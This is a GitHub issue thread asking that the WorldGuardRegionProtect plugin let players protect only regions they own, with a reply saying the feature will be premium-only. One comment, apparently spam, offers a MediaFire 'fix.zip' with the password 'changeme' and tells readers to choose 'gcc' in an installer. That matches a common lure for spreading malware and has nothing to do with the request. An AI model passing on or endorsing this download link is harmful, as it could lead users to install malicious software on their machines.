### ISSUE TITLE
Adding the wgrp addregion feature for players

### ISSUE THREAD

**Issue by gummybeer666** [RSTeamCore/WorldGuardRegionProtect#105]
### What feature do you want to see added?

The idea is to let the player protect only their region.(in which he is the owner) At the moment, a player with the permissions wgrp.command.addregion and wgrp.command.removeregion can add and remove any regions from protection, even in those where he does not belong

### Are there any alternatives?

https://vk.com/wall-164436767_26241?ysclid=m0az887nsq820256680 - it doesn't work and besides, downloading plugins from VK is strange

### Anything else?

You can add a separate line in the config to enable/disable this function

**Comment by TechHorizon2003** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by RitaSister** [comment]
this is will be added in premium version of WorldGuardRegionProtect
